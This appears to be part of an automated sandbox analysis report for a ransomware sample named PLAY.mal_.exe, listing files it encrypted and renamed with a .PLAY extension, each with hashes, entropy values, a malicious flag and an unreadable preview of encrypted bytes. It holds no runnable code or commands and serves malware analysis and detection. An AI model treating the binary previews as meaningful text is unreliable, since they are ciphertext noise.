        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.008.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.964058567586822
        Encrypted:false
        SSDEEP:
        MD5:B0AC9C7E1E85C483B7307A784598E85E
        SHA1:A40B6BAD4BB21F28E2AA65066BD8E0F0517F8796
        SHA-256:59D0BBFF0020F17D46D908D50EFD0D59E2C2433A06C5877BDA9E93ED1F50E319
        SHA-512:3C571A7CAA84396E527E5DF1180E93A9A69EBEEA0D1087081084E0451302AD0EBD51FDEED284D385B9CFF06EEBD702BB4233445FA80B98402476B7BC28C431C1
        Malicious:false
        Preview:.....{..S.;..,EU...b.Q.y..g..?..,...O..9Cp.x^..Z M....'d.y..........ne..y.b.M5:.m.CZ...V.r..7..=...-.W..._@scO..En.2..4y.A..-...-.:....../.D..y>.n.0&a. ....}~S....^..iN.^%.w@.S..Z.=..7...T'.......SA..1.v..ovy=.U.Xtl...>,c..&.x.z.....1...)..$.N~....J)qFs.dj/..t4...4..x.....]p....|._.AW..._.b&E.d.g..K.*.J..m.L.W.x.|.(DAk.P/..l(.1..y,..Z..-..~....Tl_]j.....6.`.;.....6;...:).*..#?.A ..or.&B6....U..Z3@C.Ku.<.......WX....22..Y..m..U.YZ/6...L..h..r~.d.D....<....y...Z..k........3..+H..].....g#.q.B.....R.".....D........LD......S_.Q..M.N..I..SpR....S.A.y4....?..?K.[.............C.;...i..8.l...y.E.16;.t..0.~i.........t/[cU...Q(..z..\.."..-!88.*....... ...p.h. H|._.'.1m.J..mu.....I.CA&.+.....B.N..^6[esH...\.w...n.j..j8..r...$8.H.(_.;......... ....`'.C9t....V..:.Z..JW.hY...C....5.mM...]...I..........?..F.].......$.1... .:.....q.....Q v.....tx...;i:..%.....Pd..{.$.u...#.Wp.r.->.....!z...h..Kh..6'........k._d..$.2......{I.a..@Rd..K.....yXv....

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.009.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):21560
        Entropy (8bit):7.990640605048819
        Encrypted:true
        SSDEEP:
        MD5:A2DF46175790D9BA012088C900B43B28
        SHA1:B449E880CBFA2E185770E20BE06B7519D5EBBF97
        SHA-256:0ADD976C766A5A13D38ABD8DA9B4387D03D6A2BECCC9F081FA14B9AD90BDC323
        SHA-512:CCBB794F84AB06D8F243ED7D9D0D132A6C3ECB152653FFCF7BA792544AEB6759BCD690ABA386E2788F21994B7488BC5692B28E8AD334AE014E4406FC04E5CC39
        Malicious:true
        Preview:..8d.....J.....<..oY....#..{.e.(.....}.3..|.,..yR..Y.;...}1..{...cce.%M[k....w.5..;H..Z.4.....j.W.T...dA.Q.J._..w..]...W..1#..{.W.".}....W.3V...'.u.]......mE..8vC....q...t..^...^...B.H-..........k.~..i..z....q,.c..0*L.=7i.b....^..a..i..$y.>..b...ss.,...b............mn...>....b.Y..h..+.,.lK...n.k.^.....G.}...4..*.....W..m.er......u..R0|Y..3..H.>..lz'.....8....w.......a.esD...n...K.a...K........`.B...HQ{.t.x.C.@.....d......B...m..R.\..K.WR.......K.s;N...^....R..X...T@......_.:OO..x...S..n...O..mf....b..LW..]+4..;Q.-.dL..d.+W...]..+.M....am\..i..........l.#4u.v.J..ZC..%V#...W.h"b7L..w....>."k.......7kR...r.".iUVM....S{...E..41...vE.`..7....Y..W& ....c?.J..r.g.B.U.c..L%{.g.I2....:_....... ....0...u.{r......:.V....c.Mw...u....{.Cv.>1.6..:...-.v...2.4..z....V{.!.%V....{......z;.../.....j.J..a....F...X1..Ys.|i.....!..6..Sw.Y..0...7d..}....(.8..1.....#........1 b....Z.....r$C.W2.X......{.........nM........]#..K%.9.T.L.K/G.".(')5......r..r

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.010.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.955063360238922
        Encrypted:false
        SSDEEP:
        MD5:F9ABED1A9753622EE996BB87816F8210
        SHA1:898E30F694F3A0473A936D17F2C9DD07D18D04DB
        SHA-256:292C0BB8DB038EEF24AD7F8C4B4596A4C4BE977A689CFB7E08EBBB33A1BF43AF
        SHA-512:37FE930EDB70E82B6DA75EDD03C9AC9E95DAC833FB046C7DB49D60A1E010B35427232C93B752CE6AA8F7110D6D8AF7A9DBE262543A8743E1B3EDA9E4FED8C832
        Malicious:false
        Preview:.).V.E)..............q./......,;..0\?...........7.V[...k.....%}F..z...|I]T........{...`.......c.4.@.p<..o.....>}...`,.$.V..%N.D'.B6_c+...D...25r..._..n|..`.g...-...N..\...d...._..j.H}.z.._..S..2..^......4L..:F.[.z......xvW.e.......l.Q..Ih.nrY.t...l`8B...]...V:.op...K.;7.}.k....}..nX{..R.e.L.8...aZ..(...ns#..nP'.'2q..Z..c.."........i....i.O......}cI......[.S.....l'~Z....k..k`...zE...h..^i...:O.).45..n...b..V.O.....j.8...e.w.6K.}s.;.Cv..%G.......7.....G&o6Bfr.c..'.).o5.-.a&(...wq..-.......7.QJ./.n.[..`.._..mL......2%P.[.f...}..(R.)N\.y.;...{.@.....~VT'D[.....`.4...K.......*2....g...Q.x.......p\a..N!.....k......jDgo..X.......w6...k..&...FL...B. .9B..5...mbF.i;3,=.i.,.....-...X6.f...L..W.._......... ..'|....55....S.Z5@..^=.......+:....0.I..DV..ck^.G....x.i.&.v... 2Z..".j....F.....z,....t,.0&......"Z..L..d...V......`K...Wl...7.w.1IL!]...V.6....8...G.5@rCI..,p.Y........8.......'..^.a.#...-.."....pP..:<...5K...&..M..1...[.......&?

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.011.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.965210024064226
        Encrypted:false
        SSDEEP:
        MD5:80BA803E9FA0ECFADFB842DA68994EE0
        SHA1:550344BD98C64C3AB9E65BE39A93580EAB5BDE76
        SHA-256:1E733F58417E0B75011A7DE0444EF4C39A55204E465A8DF529767F4C1D93FF83
        SHA-512:D9572C7810922B73FD410377226E6D898579F5002752A44662E8023B2611BFA66CF31FA3A54F01FC40031632A8DCD09066D6C1537F83A1F392C78BD3FF4AFFA8
        Malicious:false
        Preview:...F6..w.q..@.eE?95. .q1p.Tzj.].+....~..k...........|..\..;..^..><(.q[....':9......"...R,.\..^..E.p.(..s[....9y..bj...<;.Yb...9..[j...#C....;v..8jU...T.k...N.."..iZ..f@.W..:Wc..<....{8c..)I..|..CJ...K..&........h.r.(...m.9..$.62..nQ_.X..G..)..v..u._.'........'<.....%....h?..Z`......h._......\5....)/....;\*7...f......x....uBa...x.c..N...Rwc$..=./.....8..\..j.[.4......n.............k...S.Ag.N..,$.8.+.:..Z3.o.]EXI;...D55.k.....Bh..p@..........A.-..$..].I.s..v...Uy@.2.n9.......M...~d..]..!....I...k.C....uQ.E...Q....@.`(.r..$....f.q.E;...x...-h)'.j.....^.(h........u......+..K..%.w...#....0H=].9.;&..C.;.....5..d.~..+.....i..{xR...............%R..P.^...U.t....m........l....!.lXz.Y.|a..m...%*......)}.F.y!...V.`}Q.t..Y..H.r.Y.AL...h..jp.|}....$..5.?.)pJo..../.%...{.A4.......J..3H....6'..#.M...[.Y-..-%|...t.....Ah..>...x9...'...,...@Qa...lD.+.GK..sq.Ab.. .2.OV#t.-/@....y....i.=..E.t..<.>8.`.`...~:......X..(.W.WQ...................?.SX..l4...

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.012.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.9640414184347685
        Encrypted:false
        SSDEEP:
        MD5:2425DC8BE2FFC73B2F05D05FC88145D5
        SHA1:0E95FC81B48F4DB63A410B4EAB7ED1525371C5BD
        SHA-256:17CADCA1CB52E061B024042C00662512428377FDDECF81FDA8926AA03B5D0B7A
        SHA-512:9D149C92E677C3470FFB48D6FD7F9F0E967C20E8705CFF63C470B1FFA316822D7D8936E2642549DCB10C410E214897936FB1B9F30F9695A1A80AC43B91697BFF
        Malicious:false
        Preview:X..5..:.[uO..%....M.........i.j.....*....h.)..........v..Jxm'..~.u..17....z...7/......J...x..i....U.J.>...R.4........!.e...H..*...@...Tx..$...WHx...^U..G0...?(......v.L..t...m.$D....fK.s.#f.>?......ZR...._nb.4mSb.L.=..U...6."..4.Q..UN..qd&....Q...."..:.t....4...Cw.{.*.V....0H...H*s5E.%.pivlC....2.I.`<.....'.6.......E.......?.K.....&X0......j...K.x..|Z.X{.l... +.E+t-H..4`.$.....Z.....'........'........1.l.....].....dH.-.]....u."~.uY.'.{.....Y.~..>[.........0.N.:..Ok...A..D.1.a...&.s....*n..|..S.[x.......U(.+.}w.......|..N;.;..R...t.e?o.....[l.....H!.5..YC....v.C=.'.Ii..Q.7....n.e....X...1...y.[ .W.-.."..P..C5.n..B..}b..3....%.-..f.....#.....)..Cr.$....Yd.. .....d+.. O.9]............p..x9....g=..$Bd.M... .u..(..<.)Z...."..p5V.w.%.@......H.j......,..h.+....%......o..~"..".BH....;Y..... ".B~....Q.r..9!........[..=ghmA.Xx....}....X..77..DM..+7bx{n'...`....)u*U..US....Yx.O .....>C....z....L..v......<..l..3b.Ul!..E.?..8...../...`..:.Z.5.}F

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.013.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.9620398928975735
        Encrypted:false
        SSDEEP:
        MD5:1BFC06087045747749AD135A4819CA79
        SHA1:9826AE64CF195182FD6E9662A8A86FE6352615A5
        SHA-256:C80AE09983BED91E104EACBA274FCEA89F7E8A92A0BC3CC7476F9C5371F84301
        SHA-512:8808B8EE25DADDE49EF3F013B56DB240F3282B3985BEF433A0B1249AD880639E584ACCF6A62361A40AC5B3C9F8439989A0EE5E8649D103652AAC74EC0F72D3A1
        Malicious:false
        Preview:.h.(y.9V*;.......cp.[.....t.b.....fER.....-.3..G:b.0.7..g......m.&..XO......>}.'..E......o..>j..cL)...>...K.k..9..T.S.....K.N.E$,9F..L.5.T0.T..d.{.f.....Cx..*8.....-.r.+..t\..*......w.s.a.....-.. V5~...d..iq..A...P...r.w..,u..M..ah.\.N.....@^.,....;.=...#.nB.'..B.....:....T.J-a.......n.C......|7..A+.;..@;...S.....u...}..2F.L..;..5.....lc.D........tf. .1..$r2..`1[|8..!IZ=7H.;\...k....l..Q...RA..=%.u.....n{K.b.AO65%..........D.}G....v.4...'..#.8;....jB,...[..!#....K.../..0....R+pu.yE.LC...H..%..wj....@oy.(.?.. -..!.sR^....O......m3..I..e..2F..n.....B.......x%...h..3.lzA..q.Rv?.5.C..W.w.....>.<.-."s{2...Zb..bn...1.....?...}....x..\.|.V...}.a....(.7E.Qon..e.....i....[....!.{z...q.".X...S...nB .4.za..%g....B.x.W.t..O.^.\.%#.3...QgX3..2?..[.<....\......E.7.d...4...R...%M.r.-o....$...;~.R#D.?PT`$.(Kc..S-.l)!e.A.=*u .%M.-D&....a..+...A#&^Jg..6.a.]i.y.........Zl0w.z.G.,UO...0....Vc....6..U.."..\...?....n.ku.UM..R.!Q....Y.2....(Px...,G..?-..~...G...

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.014.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.960006635129226
        Encrypted:false
        SSDEEP:
        MD5:29BFA8201275A92D297E9770F1677145
        SHA1:9302545488AE03D1C67E2DB0F5764738CA8BE9BF
        SHA-256:E634C4F88B83DDDFBE6F6BF705F567D8A809B8D2343D012672D18F3CEB285175
        SHA-512:F2CE5859E620A18CC0246B2BD1B5A675B2D156699F2C48CE44C316FBFFBADF7820DF8D462EA8CAFB895F672F73BF7776D07288A3209D419D5E3DC3241EF98E44
        Malicious:false
        Preview:.............ck...f.2.v...Eq..0#=,z..z.....!......;.U.z.#.nu>.|.$.zj...8X......@U.T.Y...i.!..*.......ifo.....n.E..jj..44.)0o.r.H>......z./......~....H..S..Y."y7$......?h.G.5*....ZI.^...k1.&.Z..V...7..{TJ@.....B0..MN.~......v.#.{Q...F...V..{...m.ab..`.?.B< ..mJ%..<.?..#....=.z.Uj_.....g...\.P.C.d.f7..E...z5..g.......1.\...!...)'$.'..R.$.........c.Z,..{.h..I/HH.v.NJ.H.....zs...>......XXT....E$.t1q.]d0u.=K...y.../X..CmS.7..Bv^...5.]V>A...$n-}.....B..*h6....q?."/mM.#5.N.0......C.....:8.D@.}/..1..;G...Tz...MQ..Hx...'.!...U.#?...3+P..-.Y.5.....N.%..`..2:...(6.Q...)t.U..S...5........O.^.).q.@2..7-,....kdA'..h.>4^.D.?J......R9.+.^.V0...'.y.O9M%6...csG.?.MN.p[..h:Dh.G>]n...c.#?.(w.D`....n...V....|.e.t,.gw...Dt!&Jlv..Q.w...i.t...-....B....G..|jC.!o.|.U...E..._..L#.O.^........@xY].cD.[.ya_I..n;....N...+h.s..m0=..P.....>..e.#.m......<..8.q.CA..<.G......B\K...i.e...l......#.5l.q..O.F.x$..W.:..n.......|....X..g.t.).~.l.....f..{GD.6.:v.r....J..C.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.015.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.964436974522857
        Encrypted:false
        SSDEEP:
        MD5:6389E8E76516D3D02AE9AFF7B43D1891
        SHA1:01A9ACC0727FA6155E1327B8552854AE98E32C0F
        SHA-256:1497AF30A87AF4787C343DAB261351CDE86B87EA7ECCEDF507803223FCC2D417
        SHA-512:B8A2709A73FE68B1E5DF1B4D9E7FF53C004A25D84B475C8B60D96D4718651BE5E2DF0D16C773E6EFF4727F221984D603C441B3C4A65590BB4EA5700ADBFC9D59
        Malicious:false
        Preview:lw.~..2o.O(8.L.r.E.I.KM....e&.Ia..i.O`D.).z5...=>Aav.........lvb..r.....$...dF^)|TA......wl...EV#/....g:K.1t%....9..hE^......xfU5k....._..EA.)....T..o....q."I|...qq.4...o...t........(+...H....~6...X..E...j.<...T..P........n..@...Fd'.L....q..i5....g6....=.,,w.dxi....@g...D..4.....5..hF.#..W.A+..U.1...v....W._l$.c.g...A.......h..^...b,..4....';..V(.R....@_..y.=yEod(...dRj.s^......t....P..../3.+........%.../...k....d.h.~Bo>2...4|m...*....S...?g...up%..sWz.?..w..:T..L.-R.e .....S.....V..#...6..i........B&.+..w@k...!)+..N.~.X..U..]+.FJ.v.`...C..~.\...m..O#.:"s.t.V.c...=,.A...#l.6..?....W.{..R.)..;..nW.C].).@Ze"f.\...7s..8f.=...V"CX...d..e.....E...2....!O*n.F..........L..........N.b..~).$..(|.,...7...9.....m|...Y..t...h..I.p............y.P.......^b:'K0#....q{....f...k.i.2g.&...cG....a.9l.... <.....;...[uH.L[.R`..1:.......(d}:.vk..%x......Q].(...n..AcTbT....?A..y.w.....*.g....K`..*......:....\...1m.@H[..-L.;..R.-.....<.j...L..y.?!7..Q..a>.;.x...f!....?..0.]

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.016.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.963827418953566
        Encrypted:false
        SSDEEP:
        MD5:DACE244E5FB7240D0D05AD567B31E086
        SHA1:73948DB2211C2D1976E6CB958403675C68DEDA6B
        SHA-256:3F9D56AC208C37596DB4B31EC37FFF12CB7125FF3672E30B55EE06537B64303A
        SHA-512:625CB26E55BC179AC59E8045F583C05500EC845044AB0EAE1F3A52087B8C6DA80781932166A5B405E9D2E3852E962D088EE197390AABCC20DB4896D42A1570EA
        Malicious:false
        Preview:.....^...`..Q.....`[..8....B..H._.1U..m....>..S.(...]...$....._Z.g....q.gP...>I.R...*..z.........T.....T..J...JM.h.W...Q.no....Dr}.<._....JK..y..;.N$..*p{R..T<...4.;7*.?<x...D..K.%.P.Ac{X...#._i..x.\..[.W6.......;...Y!<~.4.A..;.../..MTZ...)....k...S.`...!5..{..Z...........s.....t..L..Y7.K<E.t"4.1d..-.........gqk.et.....x.G7............+....[T.K../.b(...... ..8..~..y...~.@.i*..3..C....Z4..L?..y...85.........I5>E..m....l#......i..A..B6....S@.L7.K.. d..Tm.n......<......7.D.f.......V$..T..X.K....BY..;..........."Glm.dW6@19.w..AB.Y...k...... .}...P.b%.S...V.J..C..}...*"`.l...C'4{#4.........%..I.....2.........D.MR#7,nz.P.h.........9...Y.<J...C]Q..i..q..E....t8.."f..../.c.l......y..Bq....nk1:.}..-.....h..........F.).`..3..... u.".9=..!Q..<r...v.J.HkW...1....!..D.........@.}....1.e]N[w....p....S....1..pmB..../i.,.L...4TT8W.2.....[3G..-..8..b../..^+.6.O.y+F....d... ._....L.Fl.F....es...$hE.T.....h.^>q._...;3...9c.O.......h:n........~...ZVq9.:$..zP.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateSessionOrchestration.017.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):9272
        Entropy (8bit):7.977752249432826
        Encrypted:false
        SSDEEP:
        MD5:CA8861F2BE2222BDAE1DBF79D0A0F344
        SHA1:283D94015CB25FDE80797BF6C8CF68B567755EDD
        SHA-256:C7FE06CD2F64D0D514D103EFAF766C50EACD0892D7020E7F4298BD9321E0CA7D
        SHA-512:1E61EB15B79B4A814F9EFBC753E76DA9812E216903B1554793FE654887A17CAB38212A059B0CC4615AD4A64045479C4130B0551F35697450E5B32234A4891C3D
        Malicious:false
        Preview:o..m....i..W<...G.v)......kC .h.C.203.~..>.y.G/.Pu1.zF..V._.......@..[.F...Q.q>-.x.$.@...... ]/+.S........$+..;`A...>|.-o$'..m.8..$&.I.*...e%...K8C.1..K.o9......=Q....H.....'.O.3...^..u/y@.Y..... .}D...c.....".h.V.ML.9;..[..\H`.h....}.0Y..q6K..G......VC.h..n..!.M..u...cI48...:..D...v..K~E......f..7.P.\E.4..?...nq.~}...........>.G.t..g!...c..]...I.3&...ec00...J#j.d..o.W......)-...ke'..x....K..O.+....}(....b...P...L....~x7.~..z.:$!...PV...#uSO..U..@.eM^-..P.p.O.....{|...;..^9...........J.M..0z..a.......U....r..u..6.nV.X|..^.sV.....j.n&..bq7....M..E1....@..:.v.5...v.`...\H..T.9...Ry~.....RZ.QC+(.G.(.Y..|..wE.(*...(S...0s.|R.v...=..vW..OP.K...`..g....~q.......EW.$..*........p.#].PM.&l`...1....=\..v.Kj..w.a...eE.x.K..O@....Y>++ u....(Y.q.....#*..\.#...U...3y.?Z..$..d..V)J......T..wx.HR..6T.A.f..(.._+.2.!C.x^:......`q2n.#.o...~,...9...+Y....i....._.,..O.~.....85..<..?#P.T......k.~....Y...J.G...aK.+..C.w.....R.,..|.m.H..k._.]I$...<F(o....c.5g3.q.on:R*@

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\USOShared\Logs\UpdateUx_Temp.1.etl.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):37944
        Entropy (8bit):7.995359327354051
        Encrypted:true
        SSDEEP:
        MD5:F953CE3AB62CF9D9CE6C493F736AB10D
        SHA1:A6BDADE3343961968214C4337DAB884DEDA250FF
        SHA-256:64B907D37CDB5C9EEAC5ABA8DF0C532824471370DF960AD0AD6A01AD05DBB1D4
        SHA-512:DE8186F74D5751941C32E16B1EE7726BDA1DC5C4AD31B7B4D9D0CFC60EC2121223DC5979D7817544D84302FC3543AF7A00119A83D86C910C0CEF3783AB69E37C
        Malicious:true
        Preview:.Q....]i.b98.~.~...5.7..v.?0c.....8]W.:..{..\..:-).[.C.|o.......Uc....\......cm..c-.20.uK.X=.,.A......j+y .....~..j:}.Js..L..\c|.[,.A...|..Q......l^. ..4Avc.QJ....N..X..r.w.C..RE..$..j.(..Z..j...y..........}.U.~S..+.......]......[...9.D@..l.U..v..0...gKt.d.C..=w...9..xH@..^.b'..s(Z....Z.........{./.....1.....<`.......Np.$t......9[.]o.9..]t......%J../...=..v...X.P...^x|...DH..d"`.... .........\.[#...<T[.....#...L.......|...F8..{.oS}.P....g..........(TGsv|y.Zp...9..0...JM.c.8K.3...D.y..u.p@.../....>.....'".xzm....,.)Y...uU.7+.,.)d..C..A4.Ng.on6....<7!(...~ .Xk.t...n.*W0..I.......P....$&....~8.s.. C.E.h....G..1D..d.\>Z..gg...Dm...O].DJ..1..'.7p.$Dx..o.9..Bxa.^.'..T.....&.f.0Dj...t'.e.Z%'..m/......,zi}.*.R....5.)&..DD/....c....`..<S.s).fD..;.mN...a<.d..*YpE)!h.j..}75...4.K.K*.8=......g.$kD.V....k+.L..SO.,...7&D G..wd.>.`nq.<V.?.::....b...6s.@/...{..P...:=9.....a.i...T$/_....Q8..rG.n.1.9.b.....[....gA.6.k.....f..Y.6T?.+S...+...c9.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Microsoft Office Professional Plus 2016.swidtag.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2136
        Entropy (8bit):7.9060835757446455
        Encrypted:false
        SSDEEP:
        MD5:FA7F436743EBA19FE1FF34E6BDCAFE3E
        SHA1:8BC10D44C8863759F1BABD010D0E9D94FAD1A96B
        SHA-256:A1B8C0BB38FDDD20841E707060A4B30FB7A7433349D2F3BE503FB1F3310BAABC
        SHA-512:4272878257A4E3ABC250C2FCD98B74C85977817D5DC6C4CA28746E6B409644341559F86358C1846BE6DA0CBCA7BD191183501DAD8CDDEEB2E46E74861587663E
        Malicious:false
        Preview:.e.n..7..B..G.M.....NR....#...L....K.Ww._h..W.K0..x...7... .!.C............ ..=.....=.u.S..l...c).g.|G.#..##.Gm.;.....z.{.Yw.cmE`..3k.....B.........e....)&.R.9.hy.._.{.@......f.....z..2[ ........~.#..&ATJ.!.C....4.....+.M..UZ......L.......c#^P$a.M........Io?.W.o..`...m...quh.....^z.sTM...O..w....-.Y...]...>%.?../6.......?.}X.z...r.........sAH...8m.........O.:2._W.lW...*..sC...q..2.W-o"st....k.%.hh6].q...Z.s#.....*.....8..I.I.tR.....R..}.."...o..+..K.@mZ..C.h.!t..iJ.j..H.KVa.a..%.`9.Y. ..8..z..[..o.U.n0x..........]...y.F..!..B....2....v...7...g.` .y|7....y|^.%.ms:..o..p1.'..0.....#..p..0.p..vMz...+...e...]...F<.l.....B>|..Lu.o...,..kn...B...UR.t.......i...;{.._X...;......I.,...`...X..../q.......J.b.@.1;...W.$...[ .@.VSY..9'....Y.|...X,.......jh.a8....AFS..X..GD.cX.K....9...v/....=..\.n..!. .^(..[G7M(bN*z.......g..I.df..c......08y...q-p...Is..s@....@...J.,..6\*..F.#.....z.......?Y..@x.u.>.#....ZQ..IV..\...S.K.......l.O).0.K..

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2072
        Entropy (8bit):7.910974524461601
        Encrypted:false
        SSDEEP:
        MD5:ED52B3BE4574FF8B05CC68F897BD3E8F
        SHA1:15CE1BD3F39893B3A5D2D30DA8A599A91E9FE303
        SHA-256:7F862D3F1ECF9625FE7C10BC4CB3485368B5243370CE3537C42B3EF20FF00F3C
        SHA-512:BB95F266C5766C81F1113BF20001AFFEB9F829B08C305A26B379DA34DAC585B04796748E2B7DEC3DC746F12981ABD1FA98961391AAB195023DFE7BBC4C3B7417
        Malicious:false
        Preview:...!...l...B..O...g.::...Z.40...N.v.U>.....1c.'.....z..... ..+..w.....`...b"..0w4Kt......1.......+.4.OVF.3:...s.....~........y......Z.$.D.a.W.?_.......2j......~'..y ...@.z.V....l....w.J.....8...T..]...h..eUK..8.f#:.f+X.|..[....4.J.=.3.5.5.[.0.....REB.O....m...Z....6.....;..9.......y.K'"...JnR.6.....h@..x+..$..K......D....o....h...Eu.....-.M.}...`.4.a.59-...`s..Y.e!.....u..R..#Vh. gd....q....d.0....._%.ig.O.T_N...T.......$..?.e...U3.A.5...GL...._$8#=5U......n.(...G]......J..7...u.....Z..u..S...(....".J..>g.fxd..^.RQ...$b..F..p.k.....O.a.z..z.R..2.rmTm.....#}..~An...os.U5....7......&...l....-....Zh.....,.#5.Y.......!. ..Wz.D...._"G..s.....&._...<...s^0Z,e..p@.&]Cw2..E........Iw..g.S..K.Z..\...|e'0.r5.z5i.....(Kw.....$8:/ .`....).....q..@u&M.....q..c..l...|m.&.B...g+v...[:........L...7.....:h...zX.f.M.y...]..........H.Q.G..e.r].i...p"....d..u.."......F...r...2.t.a.....h.a-T=7.....5=]h..pw.Pqf.U.q2.....Dl.. .=0.?-.'...D.9.....)....*^.#.....,.w..K.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Desktop\desktop.ini.PLAY (copy)

        Download File
